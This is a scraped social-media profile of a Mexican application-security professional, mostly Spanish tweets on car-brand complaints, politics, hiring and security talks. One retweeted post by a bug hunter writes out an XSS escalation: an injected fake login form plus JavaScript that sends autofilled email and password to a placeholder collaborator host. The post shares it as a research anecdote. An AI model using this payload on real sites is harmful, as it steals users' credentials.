Juan Carlos Calderon

@JCMaxSec

App Sec expert and OWASP fan.

Mexico

Joined December 2009

125 Following

95 Followers

287 Posts

Juan Carlos Calderon @JCMaxSec

4 months ago

@MotorpasionMex ¿tienen el dato de quejas de profeco por año? saber cuales marcas se van consolidando y cuales son "pura lengua", sería muuuy valioso. Y eso de que ya solo quedan 10% de quejas de JAC, ,meh..., igual se tuvieron que poner todas esas quejas para que hicieran caso!

0

0

0

0

1

Juan Carlos Calderon @JCMaxSec

4 months ago

Estas son las marcas de autos que más quejas tienen en Profeco en México: tres en las que más suele haber reclamaciones son chinas https://t.co/apftG4HZ0K via @motorpasionmexico

0

0

0

0

3

Juan Carlos Calderon @JCMaxSec

4 months ago

https://t.co/apftG4HZ0K no tienen el dato por año @motorpasionmexico eso nos daría idea de cuales marcas se han ido consolidando con menos quejas que en sus años iniciales y sería muuuuy valioso!!

0

0

0

0

2

JCMaxSec retweeted

Borealix @BorealixSec

about 1 year ago

🌟 Borealix en el México Business Summit 2025 🌐 👥 Gracias a todos los asistentes por las valiosas interacciones y oportunidades de colaboración. #MéxicoBusinessSummit #Ciberseguridad #InnovaciónDigital #Networking #Borealix

BorealixSec's tweet photo. 🌟 Borealix en el México Business Summit 2025 🌐

👥 Gracias a todos los asistentes por las valiosas interacciones y oportunidades de colaboración.

#MéxicoBusinessSummit #Ciberseguridad #InnovaciónDigital #Networking #Borealix https://t.co/E41lGM1sy1

BorealixSec's tweet photo. 🌟 Borealix en el México Business Summit 2025 🌐

👥 Gracias a todos los asistentes por las valiosas interacciones y oportunidades de colaboración.

#MéxicoBusinessSummit #Ciberseguridad #InnovaciónDigital #Networking #Borealix https://t.co/E41lGM1sy1

BorealixSec's tweet photo. 🌟 Borealix en el México Business Summit 2025 🌐

👥 Gracias a todos los asistentes por las valiosas interacciones y oportunidades de colaboración.

#MéxicoBusinessSummit #Ciberseguridad #InnovaciónDigital #Networking #Borealix https://t.co/E41lGM1sy1

BorealixSec's tweet photo. 🌟 Borealix en el México Business Summit 2025 🌐

👥 Gracias a todos los asistentes por las valiosas interacciones y oportunidades de colaboración.

#MéxicoBusinessSummit #Ciberseguridad #InnovaciónDigital #Networking #Borealix https://t.co/E41lGM1sy1

0

2

2

0

34

Who to follow

Seguridad Dragón

@seguridadragon

Seguridad privada con equipo élite especializado y en continua capacitación por ex militares, expertos en seguridad perimetral con soluciones personalizadas.

Juan Carlos Calderon @JCMaxSec

over 1 year ago

@hakluke @_nunohumberto Darn good music 🤣

0

0

0

0

30

Juan Carlos Calderon @JCMaxSec

over 1 year ago

@mARQcello Ha, ha, ha, mientras estoy de acuerdo con respecto a lo de andar haciendo "juntas de pueblo", me ha gustado el manejo que le han dado a la situación hasta ahora. No estoy de acuerdo en todo, pero si me ha gustado el manejo de la situacion hasta ahora :)

0

1

0

0

9

JCMaxSec retweeted

Luke Stephens (hakluke)

over 2 years ago

Someone just sent me an XSS to collaborate on. It was an interesting case so I thought I'd tweet about it. They'd found an xss in https://t.co/CkURxK6bwR, which was a subdomain that is only used to authenticate users. They were having trouble escalating the XSS because this subdomain has no access to the main application at https://t.co/WfO0XAPrLD, or the API it interacts with, which is at https://t.co/GoBAfEGRfL. I immediately thought of something that I'd heard recently (maybe on @ctbbpodcast?) where you can use an XSS to steal auto-filled plaintext credentials, so I thought I'd try to replicate this. First, injected a fake login form, like this: <form><input id="email" type="text"><input id="password" type="password"></form> This is good enough to have a password manager automatically fill the credentials if it is injected into any page on the correct domain. Now we just needed to send the credentials to the attacker server, I wrote some basic JS to do this: setTimeout(function(){ httpRequest = new XMLHttpRequest(); https://t.co/cSQ62lEWXN('GET', 'https://BURP_COLLABORATOR?'+document.getElementById("email").value+"="+document.getElementById("password").value); httpRequest.send();},2000) The timeout is required because it takes a while for the password manager to autofill the passwords. Then I used the XSS to inject the form, and the JavaScript, and voila! Plaintext credentials. This isn't a new technique, I can see there are a bunch of other articles about it - but it's the first time I've exploited an XSS to steal creds from a password manager like this, so I figured some others would find it interesting.

13

422

101

263

40K

JCMaxSec retweeted

over 3 years ago

Aparentemente hackearon @WhatsApp y robaron 487 millones de números de teléfono de cuentas activas de todo el mundo. Están a la venta por miles de dólares, y según @CyberNews, se ha corroborado que la base de datos es real. Recomiendan activar la verificación en 2 pasos.

jmatuk's tweet photo. Aparentemente hackearon @WhatsApp y robaron 487 millones de números de teléfono de cuentas activas de todo el mundo. Están a la venta por miles de dólares, y según @CyberNews, se ha corroborado que la base de datos es real. Recomiendan activar la verificación en 2 pasos. https://t.co/5DaIz0y5no

99

4K

2K

196

0

Juan Carlos Calderon @JCMaxSec

over 3 years ago

@Mel_Ys_Ao Si tengo el derecho, pero.... ¿y la voilación de la ley que? para el SAT o sus funcionarioes ni siquiera es hay una palmadita en la mano, todo se queda en mera letra escrita. ¿Donde queda la moralidad tambien?

0

0

0

0

0

Juan Carlos Calderon @JCMaxSec

over 3 years ago

https://t.co/0XSKhUP5l2 porque no me subsidian a mi tambien :( @EVIDEGARAY @jrsestaca @lacornetafm

0

0

0

0

0

Juan Carlos Calderon @JCMaxSec

over 3 years ago

México bajo ciberataques. ¿Qué posibles implicaciones tiene el ciberataque a SEDENA en México? https://t.co/qUQQ1lo4ly

0

0

0

0

0

Juan Carlos Calderon @JCMaxSec

almost 4 years ago

@EVIDEGARAY cuando AMLO se retire. No va a tener pensión presidencial? Ya renunció a ella?

0

0

0

0

0

Juan Carlos Calderon @JCMaxSec

almost 4 years ago

@MarioBeteta Es enorme la productividad y dinero perdido en esta "insistencia". Creo que hay mejores maneras, como que el patrón haga una validación masiva de los datos de los empleados y luego entrege constancias a cada trabajador, eso ahorarria muchisimo trabajo a todos

0

0

0

0

0

Juan Carlos Calderon @JCMaxSec

over 4 years ago

Echa un vistazo a este empleo de Axos Bank https://t.co/AuS7MK9DZf Esta buenisimos y si tienen dudas preguuuntenme!

0

0

0

0

0

Juan Carlos Calderon @JCMaxSec

over 4 years ago

Estamos contratando a lider de operaciones y calidad que sirva como punto de contacto con clientes. Si conocen algun interesado, ¡favor de recomendarlo! https://t.co/YdfZh2DsZf

0

0

0

0

0

Juan Carlos Calderon @JCMaxSec

over 4 years ago

Gracias a la UACH por invitarme a participar en su diplomado de seguridad informática. Nos vemos ahi la proxima semana https://t.co/XxVjLM2yXo #UACH #seguridaddelainformación #seguridadinformatica

0

0

0

0

0

Juan Carlos Calderon @JCMaxSec

over 4 years ago

@pcoronaf Ojalá sacarán el manual de ciberseguridad para gobierno. Algunos sitios ni siquiera tienen firewall, menos otras prácticas

0

0

0

0

0

Juan Carlos Calderon @JCMaxSec

almost 5 years ago

Contrast Security community Edition Demo (En Español) https://t.co/9mHAuYjJeS via @YouTube

0

0

0

0

0

Juan Carlos Calderon @JCMaxSec

almost 5 years ago

@planetlevel How is authorization tested you have to provide credentials for an A/B test? That is hard to test automatically

1

0

0

0

0

Juan Carlos Calderon @JCMaxSec

almost 5 years ago

Hey @planetlevel, how good is contrast finding API-specific findings? do you have any success cases to share?

1

2

0

0

0

Last Seen Users on Sotwe

Trends for you

Most Popular Users